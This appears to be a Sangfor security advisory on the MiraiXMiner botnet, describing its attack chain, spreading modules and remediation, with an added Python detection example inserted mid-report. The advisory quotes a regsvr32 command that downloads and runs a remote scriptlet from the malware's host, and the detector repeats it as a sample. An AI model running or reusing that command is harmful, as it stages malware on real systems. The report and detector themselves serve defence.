Alert: MiraiXMiner IoT Botnet Featuring Multiple Virus Families!

05/12/2018 15:40:36

The Sangfor Security team has recently discovered a new IoT botnet that combines features from several different virus families, including Mirai, Mykings and the Dark Cloud Trojan. Sangfor has named this new botnet MiraiXMiner. By tracking and monitoring its progress, Sangfor has found that it spreads through EternalBlue, vulnerabilities in CCTV IoT-capable devices and MS SQL, and RDP and Telnet brute-force attacks.

1. Attack Procedures
1. The virus vector msinfo.exe establishes persistence through service registration and malicious code injection.
2. A C&C command is issued to download an arbitrary attack module. MiraiXMiner downloads csrs.exe.
3. A privileged admin user account is added.
4. Three submodules are downloaded: backdoor, DNS hijacking and cleanup (the backdoor module up.rar is the well-known Dark Cloud BootKit).
5. u.exe hijacks DNS by altering the DNS configuration files.
6. The cleanup module upsnew2.exe performs multiple roles, including removing other viruses, adding auto-boot items and stopping the Windows Update service, so that the host can be controlled in the long term while it continues to download modules and perform mining operations.
7. The scanner and the Mirai attack database are used to launch a large-scale attack on the internal network.
8. The virus vector msinfo.exe connects to the cloud to auto-update the virus and fetch the latest attack module.



2. Propagation Module

Port 445 is scanned, as shown below:

Scanning is performed via the built-in MASSCAN program, as shown below:

Scanning is performed via the built-in Nmap program, as shown below:

Attacks are launched against any vulnerable targets discovered.
The following shows an EternalBlue attack CrackerMS17010 in progress:


The CrackerCCTV module attacks vulnerabilities in CCTV IoT-capable devices, as shown below:


The CrackerMSSQL module attacks vulnerabilities in MSSQL, as shown below:


Database commands are executed, as shown below:


Malicious code is written in database storage, as shown below:


CrackerRDP conducts an attack against RDP, as shown below:


CrackerTelnet conducts an attack against Telnet, as shown below:


3. Creating Admin Account
The attacker downloads the corresponding configuration file from a remote server and decrypts it, as shown below:


The downloaded config file is decrypted into an XML file, which is used to download and run the malicious program, as shown below:


The downloaded executable csrs.exe is built from a Python script. It is an exploit that creates accounts by leveraging the vulnerability MS17-010, as shown below:


An admin account is created on the host, as shown below:


An attack is launched using the vulnerability MS17-010, as shown below:

Attack parameters are as shown below:


4. Cryptomining and Dark Cloud Trojan
The malicious program is downloaded by running regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll, as shown below:

Decrypt the above XML script, as shown below:
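The regsvr32 command above is the dropper's only visible action on the host before the scriptlet runs, so it is a natural detection point. The following Python is an added example (not Sangfor's code) that flags process-creation records where regsvr32 loads a remote scriptlet through /i: and scrobj.dll; the event records are constructed for the example and the host names and the example.invalid URL are placeholders.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation records (host, command line); not taken from the report.
SAMPLE_EVENTS = [
    ("ws01", r'regsvr32 /s /u /n /i:http://up.ms1128.site:8888\s1.txt scrobj.dll'),
    ("ws02", r'"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files\Vendor\plugin.dll"'),
    ("ws03", r'REGSVR32.EXE /S /N /I:https://example.invalid/x.sct scrobj.dll'),
    ("ws04", r'regsvr32 /s /n /i:C:\temp\local.sct scrobj.dll'),
]

# regsvr32 /i:<url> scrobj.dll makes the signed Windows binary fetch and execute a
# remote COM scriptlet; the report shows exactly this staging the miner.
REGSVR32_SCRIPTLET = re.compile(
    r'regsvr32(?:\.exe)?"?\s.*?/i:(?P<url>https?://[^\s"\']+)', re.IGNORECASE)


def analyze_commandline(cmd: str):
    """Return details of the remote scriptlet load, or None if cmd is not one."""
    m = REGSVR32_SCRIPTLET.search(cmd)
    if not m or "scrobj.dll" not in cmd.lower():
        return None
    # The report's command uses a backslash after the port; normalise it so the
    # host, port and path still parse correctly.
    url = m.group("url").replace("\\", "/")
    parts = urlsplit(url)
    default_port = 443 if parts.scheme.lower() == "https" else 80
    return {"url": url, "host": parts.hostname,
            "port": parts.port or default_port, "path": parts.path}


def scan_events(events):
    """Return (host, details) for every record that loads a remote scriptlet."""
    alerts = []
    for host, cmd in events:
        details = analyze_commandline(cmd)
        if details:
            alerts.append((host, details))
    return alerts


if __name__ == "__main__":
    for host, d in scan_events(SAMPLE_EVENTS):
        print(f"{host}: regsvr32 loaded remote scriptlet from "
              f"{d['host']}:{d['port']}{d['path']}")
```

Only ws01 and ws03 are reported; a local scriptlet path or an ordinary DLL registration does not match, which keeps the rule from firing on routine installer activity.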


Upsnew2 drops the Dark Cloud Trojan item.dat and the c3.bat script. The c3.bat script has the following functions:

Removes other viruses:

Enables MSSQLSERVER:

Alters registry and scheduled task settings so that the virus launches automatically at host startup:

Disables auto update:

Loads the Dark Cloud Trojan:

Alters the firewall configuration to block ports 135, 137, 138, 139 and 445, preventing the host from being infected by other viruses.


5. Solution
1. Isolate the infected hosts, terminate all connections and disable the network adapter.
2. Block the spread channel by disabling SMB network sharing on port 445 and terminating all suspicious outgoing connections. Sangfor NGAF customers should update the signature database to 20181204 or above and enable IPS and APT detection.
3. Remove the virus with the Sangfor EDR tool, which can be downloaded here: http://go.sangfor.com/edr-tool-20181122
4. Fix the vulnerability by installing Microsoft's MS17-010 patch for EternalBlue.


COPYRIGHT © 2000-2018 SANGFOR TECHNOLOGIES INC. ALL RIGHTS RESERVED.